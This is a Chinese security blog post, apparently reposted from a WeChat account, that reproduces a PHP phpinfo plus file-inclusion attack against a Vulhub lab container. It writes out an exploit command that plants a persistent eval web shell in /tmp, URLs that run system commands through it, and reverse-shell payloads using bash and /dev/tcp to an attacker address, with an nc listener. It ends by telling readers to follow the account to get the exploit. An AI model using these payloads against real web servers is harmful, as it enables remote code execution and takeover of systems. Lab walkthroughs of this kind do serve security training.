免责声明
本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
利用场景
存在phpinfo页面,且存在文件包含漏洞,在找不到好的文件包含getshell时,可以使用。
该漏洞和php版本无关,即全版本通用。
环境搭建
Vulhub搭建参考如下:
进入到vulbub靶场的/vulhub/php/inclusion/目录
执行docker-compose up -d 创建容器(在root权限下执行)下文出现的192.168.0.140在复现的过程中需要替换成你们vulhub搭建的ip,查看方法如下,需要注意使用docker搭建的靶场存在多张网卡,要确认好ip
确认环境
访问phpinfo页面:
http://192.168.0.140:8080/phpinfo.php访问文件包含页面:
http://192.168.0.140:8080/lfi.php写入shell
执行exp命令:py -2 .\exp.py 192.168.0.140 8080 100该exp写入一个永久的shell /tmp/g<?=eval($_REQUEST[1])?>')?>
命令执行
利用文件包含,执行命令
http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system(%27id%27);写入反弹shell
通过get传递数据写入反弹shell
http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system('echo "<?php system(\"bash -c \'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261\'\");?>">/tmp/2.php');通过构造成post传递数据写入反弹shell
http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system($_POST[s]);s=echo "<?php system(\"bash -c 'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261'\");?>">/tmp/2.php
页面显示报错,没关系,反弹shell已经成功写入
反弹shell
使用nc.exe -lvvp 6666 监听6666端口访问该页面利用文件包含执行反弹shell
http://192.168.0.140:8080/lfi.php?file=/tmp/2.php显示正在连接,然后得到反弹shell
获取exp
关注浪飒sec回复
221109获取exp下载地址
历史推荐
文章来源: http://mp.weixin.qq.com/s?__biz=MzI1ODM1MjUxMQ==&mid=2247489893&idx=1&sn=8b752432bce0800cf77c50ced700482a&chksm=ea082d75dd7fa463cd8cb4f0682f161c7cced4daab8aca03db969d5e92e1ee3c31c95f369451#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh